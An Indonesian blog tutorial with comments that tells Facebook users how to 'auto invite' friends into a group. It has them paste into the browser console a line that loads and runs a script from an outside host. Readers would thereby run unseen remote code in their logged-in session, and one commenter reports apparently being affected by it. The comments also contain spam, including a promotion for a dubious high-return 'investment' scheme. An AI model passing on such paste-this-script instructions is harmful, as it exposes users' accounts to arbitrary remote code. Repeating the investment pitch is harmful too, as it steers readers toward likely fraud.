Wednesday, December 5, 2012

Cara nge-ramein Grup FB alias auto invite


بِسْــــــــــــــــــــــمِ اللّهِ الرَّحْمَنِ الرَّحِيْم


Haloo broo/siss yang lagi bosen karena grup facebook sepi , sekarang ada solusi nya haha !! saya terinspirasi dengan postingan mas Itjung di grup blogger indonesia di facebook. Cara kerjanya cukup mudah bro/sis, hanya jika browser anda berbeda ! berbeda pula caranya. Langsung aja tutorial nya bro/sis , cekidot :

Untuk yang memakai Mozila Firefox
  • 1-) Masuk dulu ke grup yang ingin bro/sis ramein 
  • 2-) Tekan tombol CTRL + SHIFT + K , pada keyboard
  • 3-) Masukan Script ini 
document.body.appendChild(document.createElement('script')).src='http://itjung.jw.lt/AutoInviteGroups.js';
 

  • 4-) Terakhir tekan enter 
Untuk yang memakai Google Chrome
  • 1-) Masuk dulu ke Grup yang ingin bro/sis ramein
  • 2-) Klik kanan pada mouse > Inspect Elemen > Console
  • 3-) Masukan Script ini
document.body.appendChild(document.createElement('script')).src='http://itjung.jw.lt/AutoInviteGroups.js';


  • 4-) Terakhir tekan enter

 Thx to: Itjung.net 

7 comments:

Haditya Syafei Sunarya said... Balas Komentar

cuma grup aja nih ??
bisa Ke FP gak? BTW kayaknya ane korban tarikan scripnya nih, tiba2 ada di grup aneh aja .. :P
hehe

BTW lagi nih, ane ikutan promo yah? ane punya website Jejaring Sosial Indonesia nih, namanya homyline, fitur lengkap,
Blogs,
Forum,
Upload Musik
Upload Video,
Upload Foto,
Polling,
Jual/Beli, dll
yang paling penting, kita lagi ngadain Promo Program yg berhadiah, souvenir menarik sampai ke gadget ternama, BB ..
yuk ahh gabung biar bisa dapet BB gratis ..

Langsung aja ke TKP nya Bro/Sis di

http://www.homyline.com/

Arief Budiman said... Balas Komentar

@Haditya Syafei Sunarya:Iya bro untuk sekarang memang cuma untuk grup, wahhh bahaya tuh haha

Wahh keren bro, wajib ikut :D thanks kunjungannya yah

aku tioe said... Balas Komentar

udah tak copy kok gak bisa di paste ya.......emang gitu yach terus tampilanya kayak gini gak...??????

[09:16:18.738] POST http://www.facebook.com/ajax/presence/update.php [HTTP/1.1 200 OK 328ms]
--
[09:16:32.301] GET http://2-ect.channel.facebook.com/pull?channel=p_100001474517418&seq=67&partition=74&clientid=602e4b03&cb=8ws0&idle=0&state=active [HTTP/1.1 200 10969ms]
[09:16:36.744] POST http://www.facebook.com/ajax/chat/buddy_list.php [HTTP/1.1 200 OK 390ms]
--
[09:16:43.283] GET http://2-ect.channel.facebook.com/pull?channel=p_100001474517418&seq=68&partition=74&clientid=602e4b03&cb=xp2&idle=2&state=active [HTTP/1.1 200 34296ms]
--

Bocah NEWBIE said... Balas Komentar

auto invite group 100% Work: kunjungi
http://sampitcity37.blogspot.com

Anonymous said... Balas Komentar

Olah Data Khusus Analisis Statistika Meliputi
Regresi,Korelasi, ANOVA, MANOVA, Chi Squares, Uji T-Test, SEM
Dengan Program/Aplikasi SPSS Dan AMOS
08995503316-085712112220-085227746673
SARANACIPTAONLINE Investasi terbaik indonesia,
investasi online yang aman, terpercaya, jujur, amanah,
terbukti membayar!! Min. Invest Rp50rb sampai Tak Terbatas,
Profit senin-minggu
Min.PO Rp20rb, Profit 2% sampai 8%/hari, masa kontrak 14 hari,
33 hari, 90 hari dan 200 hari,
silahkan pilih sesuai keinginan Anda.
Invest disini pasti untung, silahkan gabung sekarang!!
Daftar Di http://ssl.gs/waoSM
BUKTI KOMISI REFERAL BULAN OKTOBER 2013
http://www.imageporter.com/86lin42ars75/KOMISI_REFERAL_OKTOBER.jpg.html

Anonymous said... Balas Komentar

DJL hp CROSS rp.250.000, 2nd, mls, cmplt, mntp, btre ok, 2card, BECANDA! hahaha..

kok malah pada promo si?

avanza DP mulai 20 JTAN said... Balas Komentar

makasih gan infonya

Post a Comment

Blog ini dofollow , jadi coment saja jika ingin dapat backlink
tapi ada syaratnya bro/sis :
=>> Dilarang Keras coment yang menyinggung SARA
=>> Coment bebas , terutama kritik dan Saran

◄ Posting Baru Posting Lama ►
 

Followers

About Me

My photo

Tiada hari tanpa Online, Mau tuker informasi ? Saya sudah mantengin di Facebook , twitter , G+. Tuker pikiran sama sama menguntungkan kok :D

Copyright © 2012. Narrow Shot - All Rights Reserved B-Seo Versi 3 by Bamz Templates